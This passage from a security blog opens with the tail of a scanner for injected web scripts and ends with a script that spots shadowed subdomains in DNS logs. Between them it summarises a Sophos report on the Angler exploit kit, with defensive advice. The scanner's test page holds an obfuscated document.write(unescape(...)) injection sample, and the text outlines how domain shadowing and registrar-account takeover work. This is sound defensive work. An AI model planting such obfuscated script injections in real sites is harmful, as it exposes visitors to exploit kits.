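_ENCODED = "".join("%%%02X" % ord(c) for c in _PAYLOAD)
SAMPLE_PAGE = (
    "<html><body>\n"
    "<script>jQuery(document).ready(function(){ jQuery('#menu').slideToggle(); });</script>\n"
    '<script>document.write(unescape("' + _ENCODED + '"));</script>\n'
    "</body></html>\n"
)

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, found in scan_tree(sys.argv[1]).items():
            print(path, found)
    else:
        print(scan_html(SAMPLE_PAGE))
```

Run it with a path (e.g. your `wp-content` directory) to walk a site, or with no arguments to score the constructed page, where only the second script block is flagged. Minified libraries such as jquery.min.js will trip the long-line and entropy indicators, so treat a hit as a prompt to diff the file against a clean copy of the theme or plugin rather than as a verdict.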

For more information on installing updates to commonly used software, this blog can assist. Please see the “Protecting Your PC” page for how to keep software updated. Moreover; specific information on Adobe updates is available here with Microsoft updates discussed here.

Thank you.

Sophos Report on Angler Exploit Kit

Update: 7th September 2015:
A recent report from Cisco, discussed further in this article, describes the increasing prevalence and success of the Angler exploit kit due to its quick integration of newly disclosed security vulnerabilities, its use of domain shadowing and the delay by Adobe Flash users in installing security updates.
=======================
Original Post:

With the recent disclosure of several Adobe Flash zero day (zero day, defined) security vulnerabilities, which were quickly taken advantage of by attackers using exploit kits, it is becoming more important to know how to defend against these attacks.

This Sophos report provides a detailed analysis of how the exploit kits operate with a specific emphasis on the most prevalent exploit kit, the Angler exploit kit. At the end of the report, in the comments section Sophos describes the recommended actions to take to prevent such attacks occurring either by your website becoming compromised or the exploit kit attacking one of your computing devices. I have also highlighted these recommendations below (my thanks to Sophos for providing them):

  • Uninstall browser plugins such as Adobe Flash and/or Microsoft Silverlight if you don’t use them. However if you do make use of them, consider having more control over their usage (e.g. Click to Play, supported by all browsers except Internet Explorer).
  • Keep your operating system e.g. Linux, Apple Mac OS X or Windows and your most used programs up to date and install all security updates made available for them. I discuss updating/patching within the “Protecting Your PC” page.
  • Install anti-malware software. Both paid for and free versions are available (e.g. Malwarebytes, Avast, Microsoft Security Essentials etc.). Apple Mac OS X and Linux versions are also available (the provided links are examples of the many products available). Please choose a package that meets your needs in terms of functionality and price. Products which include heuristics (heuristics, defined) should have more success in preventing these attacks from infecting your devices.

The exploits delivered by these exploit kits seek to evade detection by using obfuscation (further information on obfuscation techniques) and by building a unique variant of the exploit for each request received by the exploit website, which makes detection of these threats using anti-malware increasingly difficult. Anti-sandbox techniques (e.g. detecting virtual machines and analysis tools such as Fiddler) are also used to make analysis of the exploit samples more difficult for malware researchers seeking to build detections against them.

In addition to the recommendation to use anti-malware software, corporate environments can deploy next-generation IPS (NGIPS) (Intrusion Prevention Systems, defined) to detect these exploits as they attempt to attack your devices.

Within the Sophos report a technique is mentioned that attackers using exploit kits employ to bring traffic to websites of their choice; this technique is known as domain shadowing (also referred to as DNS shadowing). A legitimate website’s domain name (e.g. example.com) is used to create subdomains (e.g. random.malware.example.com or malware.example.com) that the attackers then point at servers they control. These subdomains have a very short lifetime (e.g. a matter of minutes), which makes them difficult to predict and to block using blacklists (lists of IP addresses or domain names that are blocked because those addresses or domains have been observed sending spam or hosting malware that is delivered to visitors of such websites).

These subdomains can be created because the login credentials for the domain registration account (e.g. with companies such as GoDaddy) have been compromised by the attackers. Since many website owners infrequently check these accounts, they are more likely to be compromised without anyone noticing. These accounts are initially compromised by a phishing attack. As well as using the advice within the phishing article linked to above, the following recommendations (as per Sophos’ advice) would help to detect and prevent your domain registration account becoming compromised:

  1. Send email notifications after DNS changes: This will allow you to take action to re-secure your account e.g. changing your password and/or enabling two-factor authentication.
  2. Implement two-factor authentication: This article explains how to enable this feature for GoDaddy accounts.

The above 3 suggestions from Sophos (in addition to the use of NGIPS for corporate environments), along with the advice concerning the protection of your domain registration accounts, should keep you safe from this prevalent and sophisticated exploit kit.
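As an added example of my own (not part of the Sophos or Cisco material), here is the defender-side check that recommendation 1 above makes possible once you are looking at DNS data for your own domain: given a resolver or passive-DNS log, flag subdomains of a monitored domain that you never published and that resolve to addresses outside your own ranges, and report how briefly each one was alive. The POLICY table, the log lines and the short-lived `q7x2k.example.com` name are constructed for the example, and the RFC 5737 documentation ranges stand in for real addresses.

```python
import ipaddress
from datetime import datetime

# Per-apex policy. Constructed for this example: the hostnames you legitimately
# publish and the address ranges your DNS records are allowed to point at.
POLICY = {
    "example.com": {
        "known_hosts": {"www", "mail"},
        "known_nets": [ipaddress.ip_network("203.0.113.0/24")],
    },
}

# Constructed resolver/passive-DNS log: "<UTC time> <qname> <rtype> <answer>".
# q7x2k.example.com is the shadowed subdomain: unknown label, off-net address,
# alive for a few minutes. staging.example.com is unknown but on-net, so not alerted.
SAMPLE_LOG = """\
2015-08-12T10:01:07Z www.example.com A 203.0.113.10
2015-08-12T10:01:09Z mail.example.com A 203.0.113.25
2015-08-12T10:03:41Z staging.example.com A 203.0.113.40
2015-08-12T10:05:02Z q7x2k.example.com A 198.51.100.77
2015-08-12T10:07:55Z q7x2k.example.com A 198.51.100.77
2015-08-12T10:12:30Z cdn.assets.example.com A 198.51.100.78
2015-08-12T10:14:00Z www.otherdomain.org A 192.0.2.5
"""


def parse_log(text):
    """Yield (timestamp, qname, answer_ip) for A/AAAA answers; skip malformed lines."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4 or parts[2] not in ("A", "AAAA"):
            continue
        try:
            ts = datetime.strptime(parts[0], "%Y-%m-%dT%H:%M:%SZ")
            ip = ipaddress.ip_address(parts[3])
        except ValueError:
            continue
        yield ts, parts[1].rstrip(".").lower(), ip


def monitored_apex(qname, policy):
    """Return the monitored apex domain that qname falls under, or None."""
    for apex in policy:
        if qname == apex or qname.endswith("." + apex):
            return apex
    return None


def find_shadowed(records, policy=POLICY):
    """Group off-policy subdomains of monitored apexes, with first/last seen and lifetime."""
    seen = {}
    for ts, qname, ip in records:
        apex = monitored_apex(qname, policy)
        if apex is None or qname == apex:
            continue
        label = qname[: -(len(apex) + 1)]          # "cdn.assets" for cdn.assets.example.com
        rules = policy[apex]
        if label in rules["known_hosts"]:
            continue
        if any(ip in net for net in rules["known_nets"]):
            continue                               # unknown name on our own ranges: review, not alert
        entry = seen.setdefault(qname, {"name": qname, "apex": apex, "ips": set(),
                                        "first_seen": ts, "last_seen": ts})
        entry["ips"].add(str(ip))
        entry["first_seen"] = min(entry["first_seen"], ts)
        entry["last_seen"] = max(entry["last_seen"], ts)
    findings = []
    for entry in seen.values():
        entry["lifetime_s"] = int((entry["last_seen"] - entry["first_seen"]).total_seconds())
        entry["ips"] = sorted(entry["ips"])
        findings.append(entry)
    return sorted(findings, key=lambda e: e["first_seen"])


if __name__ == "__main__":
    for f in find_shadowed(parse_log(SAMPLE_LOG)):
        print("%-26s %-16s first=%s lifetime=%ds" % (
            f["name"], ",".join(f["ips"]), f["first_seen"].isoformat(), f["lifetime_s"]))
```

On the constructed log this reports `q7x2k.example.com` (alive for 173 seconds) and `cdn.assets.example.com`, and says nothing about `staging.example.com` because it points inside your own range. The short lifetime is the tell: a name that exists for minutes and points off-net is exactly what a blacklist cannot keep up with, and what the registrar change notification from recommendation 1 lets you confirm against the account’s own history.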

Thank you.